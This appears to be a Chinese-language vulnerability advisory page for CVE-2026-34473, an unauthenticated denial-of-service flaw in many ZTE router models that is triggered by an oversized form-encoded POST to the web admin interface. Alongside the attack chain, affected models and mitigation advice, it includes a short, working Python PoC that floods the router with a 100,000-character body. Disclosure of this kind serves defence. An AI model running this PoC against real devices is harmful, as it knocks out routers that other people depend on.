IPBUF安全漏洞报告
English
CVE-2026-34473 CVSS 7.5 高危

CVE-2026-34473: ZTE路由器未授权拒绝服务漏洞

披露日期: 2026-05-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34473
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
ZTE H8102E, H168N, H167A, H199A, H288A, H198A, H267A, H267N, H268A, H388X, H196A, H369A, H268N, H208N, H367N, H181A, H196Q

相关标签

拒绝服务DoSZTERouter未授权访问IoT

漏洞概述

该漏洞影响多款ZTE路由器设备。由于Web接口处理逻辑缺陷,攻击者无需认证即可向路由器Web管理界面发送超大的application/x-www-form-urlencoded类型POST请求,从而触发拒绝服务条件。成功利用该漏洞会导致路由器管理界面完全无响应,直至设备重启。受影响设备包含H8102E、H168N等多个型号,主要涉及2022年之前的固件版本。

技术细节

该漏洞的原理在于ZTE路由器的Web服务器组件未能正确校验入站HTTP POST请求的Content-Length或实际Body大小。攻击者利用`application/x-www-form-urlencoded`格式构造超长数据字段发送给目标设备。由于攻击无需用户交互且无需身份认证(PR:N),远程攻击者可轻易实施攻击。当设备尝试解析过大的POST Body时,可能因内存耗尽或缓冲区溢出导致HTTP服务进程崩溃,造成管理界面挂起。根据供应商反馈,官方固件在2021年3月23日后已修复此问题,但部分运营商定制的老旧固件可能仍包含漏洞。

攻击链分析

STEP 1
侦察
扫描网络中开放的ZTE路由器Web管理端口,确认目标设备型号及是否存在Web服务。
STEP 2
漏洞利用
向目标路由器的Web管理接口发送特制的HTTP POST请求,Content-Type为application/x-www-form-urlencoded,Body包含超长数据。
STEP 3
拒绝服务
路由器处理超长数据时耗尽资源或进程崩溃,导致Web管理界面无法访问,服务中断。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the ZTE router web interface target_url = "http://192.168.1.1/" # Create a large payload to trigger the DoS # Sending an oversized application/x-www-form-urlencoded body large_payload = {"data": "A" * 100000} headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } try: print(f"Sending payload to {target_url}...") response = requests.post(target_url, data=large_payload, headers=headers, timeout=10) print(f"Response status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") print("DoS trigger attempt completed.")

影响范围

ZTE H8102E (2022年之前固件)
ZTE H168N (2022年之前固件)
ZTE H167A (2022年之前固件)
ZTE H199A (2022年之前固件)
ZTE H288A (2022年之前固件)
ZTE H198A (2022年之前固件)
ZTE H267A (2022年之前固件)
ZTE H267N (2022年之前固件)
ZTE H268A (2022年之前固件)
ZTE H388X (2022年之前固件)
ZTE H196A (2022年之前固件)
ZTE H369A (2022年之前固件)
ZTE H268N (2022年之前固件)
ZTE H208N (2022年之前固件)
ZTE H367N (2022年之前固件)
ZTE H181A (2022年之前固件)
ZTE H196Q (2022年之前固件)

防御指南

临时缓解措施
建议立即检查路由器固件版本并进行升级。如果由于设备限制无法升级,应关闭Web管理界面的广网访问(WAN访问),并将管理端口仅暴露给受信任的管理终端,以降低被攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表